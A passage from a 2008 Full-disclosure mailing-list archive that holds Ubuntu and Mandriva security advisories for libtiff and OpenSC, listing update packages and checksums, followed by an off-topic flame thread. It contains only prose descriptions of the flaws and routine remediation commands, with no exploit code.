3.7.4-1ubuntu3.3 Ubuntu 7.04: libtiff4 3.8.2-6ubuntu1 Ubuntu 7.10: libtiff4 3.8.2-7ubuntu2.1 Ubuntu 8.04 LTS: libtiff4 3.8.2-7ubuntu3.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Drew Yao discovered that the TIFF library did not correctly validate LZW compressed TIFF images. If a user or automated system were tricked into processing a malicious image, a remote attacker could execute arbitrary code or cause an application linked against libtiff to crash, leading to a denial of service. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4-1ubuntu3.3.diff.gz Size/MD5: 19356 56610d9fbd62d610f7004b3d30099c8e http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4-1ubuntu3.3.dsc Size/MD5: 802 426326dc802835cf100d63d6842b9939 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4.orig.tar.gz Size/MD5: 1280113 02cf5c3820bda83b35bb35b45ae27005 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.3_amd64.deb Size/MD5: 220614 ff6387e7888bdf3b1d3515d0eede40c1 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.3_amd64.deb Size/MD5: 282146 75b17acb52792737598afba03b1cb835 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.3_amd64.deb Size/MD5: 475444 624f548a9b16339c5214b87a8587e0af http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.3_amd64.deb Size/MD5: 44520 1522729abef4145d8ae4fb125892e03b http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.3_amd64.deb Size/MD5: 49702 32735e413d785c456f8e340dbb3e974f i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.3_i386.deb Size/MD5: 205772 330fd846b4c42cfea4a86db7cd578032 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.3_i386.deb Size/MD5: 258868 4248ca40bb9516d3f15af5ea0b7d82e3 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.3_i386.deb Size/MD5: 461668 8e64e0f252f0cf1805a95503763a7ee7 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.3_i386.deb Size/MD5: 44496 38356372e09eacc21c85147a64730863 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.3_i386.deb Size/MD5: 49028 0f209680ec3fe2d63b8f2ee1eb82d671 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.3_powerpc.deb Size/MD5: 239612 85752da1b75412f455964b6e330d9b9c http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.3_powerpc.deb Size/MD5: 287816 7dbabece275f8672edb8a23d55a7a473 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.3_powerpc.deb Size/MD5: 475776 4aa903c0a0ff484a56c5fe1704a4e727 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.3_powerpc.deb Size/MD5: 46734 bb81db39da467e2625c0d042d3a8cd28 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.3_powerpc.deb Size/MD5: 51374 a98d703c16b08432c5faba227b49a11c sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.3_sparc.deb Size/MD5: 208422 3403ad880d5a4928093e37077325b249 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.3_sparc.deb Size/MD5: 269832 9e31723f565218781859094e02157832 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.3_sparc.deb Size/MD5: 466524 60370fd4a11ed2ab9405d1d34ec89613 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.3_sparc.deb Size/MD5: 44444 d55f667802302d260a0e9fa818a84062 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.3_sparc.deb Size/MD5: 49580 8e9cf307f440d06e4fac7f8a0e72b575 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-6ubuntu1.diff.gz Size/MD5: 17421 c27407897402d8784aaa78872df66084 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-6ubuntu1.dsc Size/MD5: 894 7f473766d9506c9cf8c9dc9fc301899a http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2.orig.tar.gz Size/MD5: 1333780 e6ec4ab957ef49d5aabc38b7a376910b amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-6ubuntu1_amd64.deb Size/MD5: 185580 b0e5244445e5b5842e15ede52b62a464 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-6ubuntu1_amd64.deb Size/MD5: 248558 f870334e57d6cf450c113b434ec7dc1f http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-6ubuntu1_amd64.deb Size/MD5: 491096 f082f77dec69c785f86c7da6a34e30bf http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-6ubuntu1_amd64.deb Size/MD5: 4948 2af2beb4111fec29a89f4fc5b345dd4d http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-6ubuntu1_amd64.deb Size/MD5: 10380 2ae539b37bfc0a4fdf0b4d1f79d71c01 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-6ubuntu1_i386.deb Size/MD5: 174706 06ddc26a9eb1f25e51a537f4d13d0cd7 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-6ubuntu1_i386.deb Size/MD5: 230880 1e263f73724556b229ce53da89f1bb6c http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-6ubuntu1_i386.deb Size/MD5: 483176 c204eee64ba32343630090710e886ce5 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-6ubuntu1_i386.deb Size/MD5: 4948 0583b395261bfc9e8971845183aa1370 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-6ubuntu1_i386.deb Size/MD5: 9870 afb43b9979860ab71d5b18f667a94234 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-6ubuntu1_powerpc.deb Size/MD5: 221280 67928c23965f4aad6dc9bd0904a5de3c http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-6ubuntu1_powerpc.deb Size/MD5: 255168 1ee1410c16e8878c1363714c7def2039 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-6ubuntu1_powerpc.deb Size/MD5: 496328 0efa9338a0a0a74593785ad710bff29c http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-6ubuntu1_powerpc.deb Size/MD5: 7444 5b6cf616b9371fb54ba7cd4d74671539 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-6ubuntu1_powerpc.deb Size/MD5: 13110 c3192321c2d2a212b4acb12a95958338 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-6ubuntu1_sparc.deb Size/MD5: 178680 5b6c97cd81cd4a6df4d4228ee48bb81e http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-6ubuntu1_sparc.deb Size/MD5: 236610 7e3286d3b39739a92c131d841fc6fa53 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-6ubuntu1_sparc.deb Size/MD5: 482248 8cf86b28cc0b967efaa635f28408e70e http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-6ubuntu1_sparc.deb Size/MD5: 4690 0d8ef4cc1149bc175e1b4cef56a533ac http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-6ubuntu1_sparc.deb Size/MD5: 10630 4fab06812752f458f00bbe408c4a5e51 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-7ubuntu2.1.diff.gz Size/MD5: 17693 d8bfc71ab431317d9d7776e8904d41cb http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-7ubuntu2.1.dsc Size/MD5: 898 0e2bd83921a76666aaad9f0db1d2143f http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2.orig.tar.gz Size/MD5: 1333780 e6ec4ab957ef49d5aabc38b7a376910b amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu2.1_amd64.deb Size/MD5: 186046 5eca7cf38e7a627ac9ff35e05341c6a3 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu2.1_amd64.deb Size/MD5: 572732 6d8a9c1762acb37ac98637f5838677bd http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu2.1_amd64.deb Size/MD5: 167514 7c316c12186064ce36fa302eeb1a9d35 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu2.1_amd64.deb Size/MD5: 5030 36e2e41d1c74cba5f6226adcdb9635d4 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu2.1_amd64.deb Size/MD5: 10482 398ee14c1a54bf682843ab5b4d5a1ef2 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu2.1_i386.deb Size/MD5: 175032 35f9d040cf7bb70a3e0cdcaed891e8ea http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu2.1_i386.deb Size/MD5: 555062 b95d128052ee5deddde5512404116d93 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu2.1_i386.deb Size/MD5: 159682 6fecbcf423292c8afb087b717bc39733 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu2.1_i386.deb Size/MD5: 5036 58dea786bf7ab7b9f124864076f98bc7 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu2.1_i386.deb Size/MD5: 9950 4530d1926d2776a808b92451d241b40a lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu2.1_lpia.deb Size/MD5: 176688 c34dd42b7fb2c866a337cf0a831500dd http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu2.1_lpia.deb Size/MD5: 554916 5c89af650f71fa329f9b27c964e159b5 http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu2.1_lpia.deb Size/MD5: 159016 0e4f184a9264ecd2669df232f031f5bc http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu2.1_lpia.deb Size/MD5: 4886 c365fc0610f673b5b514190f52c9b2cd http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu2.1_lpia.deb Size/MD5: 9950 eedb7a284fd8ccfde7373719c5aa8e09 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu2.1_powerpc.deb Size/MD5: 221632 d54b58c8832e981a496517aee739e96d http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu2.1_powerpc.deb Size/MD5: 579494 ab32f5a3bdb94d98cfd5cec17fdbdb8b http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu2.1_powerpc.deb Size/MD5: 172920 6221864857865170ebc103e8e9ca2f1d http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu2.1_powerpc.deb Size/MD5: 7524 cce4cd11ab76e2a20fb23231128013d3 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu2.1_powerpc.deb Size/MD5: 13184 4417c793e3b787fb4925052e5628a487 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu2.1_sparc.deb Size/MD5: 179138 e056aaaf8281aeeec8e93bb4c646b11e http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu2.1_sparc.deb Size/MD5: 560334 28115f9f96039c2ea6a861be5418d2e4 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu2.1_sparc.deb Size/MD5: 159258 951e1ad2ff233ccf9a2357d6fd7c9d5a http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu2.1_sparc.deb Size/MD5: 4794 4da0d6d8b2c59f8d834f26893d056a77 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu2.1_sparc.deb Size/MD5: 10734 2430febfadfa3afef94890422229333a Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-7ubuntu3.1.diff.gz Size/MD5: 17739 3df53cb9be4eac8018114eca54eeddd0 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-7ubuntu3.1.dsc Size/MD5: 898 63c01af90b1a28f341cda765cb388af5 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2.orig.tar.gz Size/MD5: 1333780 e6ec4ab957ef49d5aabc38b7a376910b amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.1_amd64.deb Size/MD5: 186212 cb1aa7ea448c64d8a071db1e7103abde http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.1_amd64.deb Size/MD5: 570784 d42a106beb13b5fada52bb49b23348e0 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.1_amd64.deb Size/MD5: 130572 d92ef8e00a2c11a92ef2258c9ee34509 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.1_amd64.deb Size/MD5: 5076 505cb2e12de00a198f6043cfa5826f99 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.1_amd64.deb Size/MD5: 10500 3f4885e033e8b49ac0ace8a25033bd70 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.1_i386.deb Size/MD5: 175046 e1968da8535ff6051d1fd16fa515e77f http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.1_i386.deb Size/MD5: 552288 b22a3ffa9d2bd620aa7dcb5897ecb65d http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.1_i386.deb Size/MD5: 122264 c7e7c7b3d1f51471a67495a82c8c318c http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.1_i386.deb Size/MD5: 5038 c15e0e405b52dac9ae0ba43bf0bf2929 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.1_i386.deb Size/MD5: 9936 d295285a90e2f40f4c6be563f4feecf8 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.1_lpia.deb Size/MD5: 177130 feec0c26db46f966db003e73e04e42ca http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.1_lpia.deb Size/MD5: 554830 6833fbea686cd3780bd8e814aea90693 http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.1_lpia.deb Size/MD5: 123436 ba48f119c3690bafac6dc0914b080076 http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.1_lpia.deb Size/MD5: 4920 74d243746774e0ad29fc9a5c888f88fa http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.1_lpia.deb Size/MD5: 9976 79dd38d3c74419e2f3af36599c3c0ed0 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.1_powerpc.deb Size/MD5: 223256 dc107cbd87d9106985537d6c275a0544 http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.1_powerpc.deb Size/MD5: 576802 7b70d820ee684cdccda2abb2f0803578 http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.1_powerpc.deb Size/MD5: 133868 bdfb766eeab2dfc1ee4e30c64464a581 http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.1_powerpc.deb Size/MD5: 7508 47e95d771f3e56e8d0edb098a227699d http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.1_powerpc.deb Size/MD5: 13288 df5e73b79db7688fbb097123a8893886 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.1_sparc.deb Size/MD5: 178648 76db5473a395f84e57f74882d4276032 http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.1_sparc.deb Size/MD5: 558200 2fa5edc2be0a83f0d8b5a872ad2852cc http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.1_sparc.deb Size/MD5: 122054 d54617bcf0f9ee0eb0593dc57f6cacaa http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.1_sparc.deb Size/MD5: 4802 bdc15c3e7f4658e9747e6092e7c118a5 http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.1_sparc.deb Size/MD5: 10696 0cbe55aa53a298214936bcd103370ad6 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 235 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080902/85310008/attachment.bin From security at mandriva.com Tue Sep 2 22:14:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Tue, 02 Sep 2008 15:14:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:183 ] opensc Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:183 http://www.mandriva.com/security/ _______________________________________________________________________ Package : opensc Date : September 2, 2008 Affected: 2007.1, 2008.0, 2008.1, Corporate 4.0 _______________________________________________________________________ Problem Description: Chaskiel M Grundman found that OpenSC would initialize smart cards with the Siemens CardOS M4 card operating system without proper access rights. This allowed everyone to change the card's PIN without first having the PIN or PUK, or the superuser's PIN or PUK (CVE-2008-2235). Please note that this issue can not be used to discover the PIN on a card. If the PIN on a card is the same that was always there, it is unlikely that this vulnerability has been exploited. As well, this issue only affects smart cards and USB crypto tokens based on Siemens CardOS M4, and then only those devices that were initialized by OpenSC. Users of other smart cards or USB crypto tokens, or cards that were not initialized by OpenSC, are not affected. After applying the update, executing 'pkcs15-tool -T' will indicate whether the card is fine or vulnerable. If the card is vulnerable, the security settings need to be updated by executing 'pkcs15-tool -T -U'. The updated packages have been patched to prevent this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2235 http://www.opensc-project.org/security.html _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.1: 77f7d7afda2b14397fd49eb9a40fe277 2007.1/i586/libopensc2-0.11.1-3.1mdv2007.1.i586.rpm 63ac5b681a7c32ff5fa5a19eaacd99c4 2007.1/i586/libopensc2-devel-0.11.1-3.1mdv2007.1.i586.rpm 70e9d0aa9fd4ee98e44acb640cca7334 2007.1/i586/mozilla-plugin-opensc-0.11.1-3.1mdv2007.1.i586.rpm 9990fd668eb0db7a2c3a067663935e6c 2007.1/i586/opensc-0.11.1-3.1mdv2007.1.i586.rpm 2ef9d3fd31d521b775f36480608f5494 2007.1/SRPMS/opensc-0.11.1-3.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 7ff78a629ff3fc4ebae26081445476b5 2007.1/x86_64/lib64opensc2-0.11.1-3.1mdv2007.1.x86_64.rpm d782522d41b4c9c3740d6d3917560a9f 2007.1/x86_64/lib64opensc2-devel-0.11.1-3.1mdv2007.1.x86_64.rpm 6e7cc1f3c8dd8485a182704d64a59c8b 2007.1/x86_64/mozilla-plugin-opensc-0.11.1-3.1mdv2007.1.x86_64.rpm 9337e42a69c15124642ed8f9756fd3c2 2007.1/x86_64/opensc-0.11.1-3.1mdv2007.1.x86_64.rpm 2ef9d3fd31d521b775f36480608f5494 2007.1/SRPMS/opensc-0.11.1-3.1mdv2007.1.src.rpm Mandriva Linux 2008.0: 4ce42db0e198b6ce9c9287594ee3fafd 2008.0/i586/libopensc2-0.11.3-2.1mdv2008.0.i586.rpm 70546abd01b00bab812fa6fea4ae4d16 2008.0/i586/libopensc-devel-0.11.3-2.1mdv2008.0.i586.rpm eba548b0a0547b26056233f5e8ca6adb 2008.0/i586/mozilla-plugin-opensc-0.11.3-2.1mdv2008.0.i586.rpm 7220fd9c1e95158f787cc8369826ec32 2008.0/i586/opensc-0.11.3-2.1mdv2008.0.i586.rpm ce97f832256d12037e51bafb9d70e5ef 2008.0/SRPMS/opensc-0.11.3-2.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 5378764b2b2d3cd848ac0ac542287b94 2008.0/x86_64/lib64opensc2-0.11.3-2.1mdv2008.0.x86_64.rpm a6dbaabff7dbd6cabc1202a334c663b2 2008.0/x86_64/lib64opensc-devel-0.11.3-2.1mdv2008.0.x86_64.rpm f3b2891c740068fa7f328690f8a53c0a 2008.0/x86_64/mozilla-plugin-opensc-0.11.3-2.1mdv2008.0.x86_64.rpm 9ad409a7e667a9bc7c448ad207ce2afd 2008.0/x86_64/opensc-0.11.3-2.1mdv2008.0.x86_64.rpm ce97f832256d12037e51bafb9d70e5ef 2008.0/SRPMS/opensc-0.11.3-2.1mdv2008.0.src.rpm Mandriva Linux 2008.1: d2f1aecf3d76a0de1eb2314467e8039c 2008.1/i586/libopensc2-0.11.3-2.1mdv2008.1.i586.rpm 25cbd704341f975c3608b2415f73876a 2008.1/i586/libopensc-devel-0.11.3-2.1mdv2008.1.i586.rpm afeb1a983ab5dc9175abe9a3d4d2a043 2008.1/i586/mozilla-plugin-opensc-0.11.3-2.1mdv2008.1.i586.rpm 2e4f8fbf6baf274e24d0d68713c20bb0 2008.1/i586/opensc-0.11.3-2.1mdv2008.1.i586.rpm 53c7c0bc38eb3210137ce329559705cf 2008.1/SRPMS/opensc-0.11.3-2.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 78655b07b2736207d38d165f695f5e72 2008.1/x86_64/lib64opensc2-0.11.3-2.1mdv2008.1.x86_64.rpm 55f4a5fe2db33ec43b74353b92b01c6d 2008.1/x86_64/lib64opensc-devel-0.11.3-2.1mdv2008.1.x86_64.rpm 70d7f144e01d25f79b622484db2ef0bd 2008.1/x86_64/mozilla-plugin-opensc-0.11.3-2.1mdv2008.1.x86_64.rpm 807e29fd2d0560f65eff7fff274aa5e2 2008.1/x86_64/opensc-0.11.3-2.1mdv2008.1.x86_64.rpm 53c7c0bc38eb3210137ce329559705cf 2008.1/SRPMS/opensc-0.11.3-2.1mdv2008.1.src.rpm Corporate 4.0: f429cd809bb72592a21b37921ef4c3a0 corporate/4.0/i586/libopensc2-0.10.1-2.1.20060mlcs4.i586.rpm f91cc391ac3c574701b27d65ff2f14eb corporate/4.0/i586/libopensc2-devel-0.10.1-2.1.20060mlcs4.i586.rpm 7eb7c1057b2c47306482d0afc1e6e859 corporate/4.0/i586/mozilla-plugin-opensc-0.10.1-2.1.20060mlcs4.i586.rpm 4c69219b2f389fe050df05985deecb86 corporate/4.0/i586/opensc-0.10.1-2.1.20060mlcs4.i586.rpm 8830d7341d49f9da956a907e21e9a7a0 corporate/4.0/SRPMS/opensc-0.10.1-2.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: d92325b44dbf5deb8cfcd0cbf4f59012 corporate/4.0/x86_64/lib64opensc2-0.10.1-2.1.20060mlcs4.x86_64.rpm 2944306bed9b725e7c0bc196416de3c2 corporate/4.0/x86_64/lib64opensc2-devel-0.10.1-2.1.20060mlcs4.x86_64.rpm 424b680dbde7f548b731ecc4bf8021fc corporate/4.0/x86_64/mozilla-plugin-opensc-0.10.1-2.1.20060mlcs4.x86_64.rpm 70c9f7f70ca3e6635c80608189a220e0 corporate/4.0/x86_64/opensc-0.10.1-2.1.20060mlcs4.x86_64.rpm 8830d7341d49f9da956a907e21e9a7a0 corporate/4.0/SRPMS/opensc-0.10.1-2.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIvX6MmqjQ0CJFipgRAoRWAKDJeFahAQ2AR414gjXP8O5e9kA+IQCdGkgV NXjfAeIK16LGCRR9/DHUvlU= =BPKk -----END PGP SIGNATURE----- From maillists at thelonecoder.com Tue Sep 2 22:07:55 2008 From: maillists at thelonecoder.com (Stephen Johnson) Date: Tue, 02 Sep 2008 14:07:55 -0700 Subject: [Full-disclosure] die In-Reply-To: <2d792fb20809021359u3f07b51cmc1d08cca144eb92f@mail.gmail.com> Message-ID: > Subject: Re: [Full-disclosure] die > > >> Who do you think you are, Gadi Evron or something? Don't tell people what to >> do. >> > > Who do you think you are, Gadi Evron or something? Don't tell people what to > do. Firefox has detected that the server is redirecting the request for this address in a way that will never complete -- Stephen Johnson c | eh The Lone Coder http://www.thelonecoder.com continuing the struggle against bad code http://www.fortheloveofgeeks.com I?m a geek and I?m OK! -- From xploitable at gmail.com Tue Sep 2 23:33:50 2008 From: xploitable at gmail.com (n3td3v) Date: Tue, 2 Sep 2008 23:33:50 +0100 Subject: [Full-disclosure] die In-Reply-To: References: <2d792fb20809021359u3f07b51cmc1d08cca144eb92f@mail.gmail.com> Message-ID: <4b6ee9310809021533i4c4b8d01l822b7520dcecc6e3@mail.gmail.com> On Tue, Sep 2, 2008 at 10:07 PM, Stephen Johnson wrote: > >> Subject: Re: [Full-disclosure] die >> >> >>> Who do you think you are, Gadi Evron or something? Don't tell people what to >>> do. >>> >> >> Who do you think you are, Gadi Evron or something? Don't tell people what to >> do. > > Firefox has detected that the server is redirecting the request for this > address in a way that will never complete > As long as Marcus Sachs doesn't make cyber security a national security agenda as the next administration is coming in. n3td3v saw that as a real threat to other countries national security specifically the United Kingdom, and as such I am on false flag alert. I'm convinced Marcus Sachs is hungry for power in Washington to do with cyber security. I think thats what was behind his senseless domain name reportage on the Sans Dairy, he wanted to put cyber security infront of the next administration as it is coming in. He thought Gustav was gonna be a major cat 4, cat 5 hurricane and thought this is a perfect way to put cyber security infront of the next next administration as they are coming in. Unfortunately for him his postings of domain names just turned into an alert board for the cyber criminals and helped them in knowing which domains not to use in cyber attacks. Plus the hurricane ended up making landfall on the Gulf Coast as a cat 2, cat 1 hurricane, so made his attempts to artificially ramp up cyber security as a national security agenda a damp squid. Although there is a flaw in his thinking, why make something a national security agenda when it isn't one? And thats what worries me. Why not let it naturally be a national security agenda or not be a natural national security agenda, why do you need to ramp something up to be a national security agenda when it isn't one? Cyber security isn't a national security agenda, but folks like Marcus Sachs want it to be one, so he can gain control of "cyber" in Washington. This is what i'm 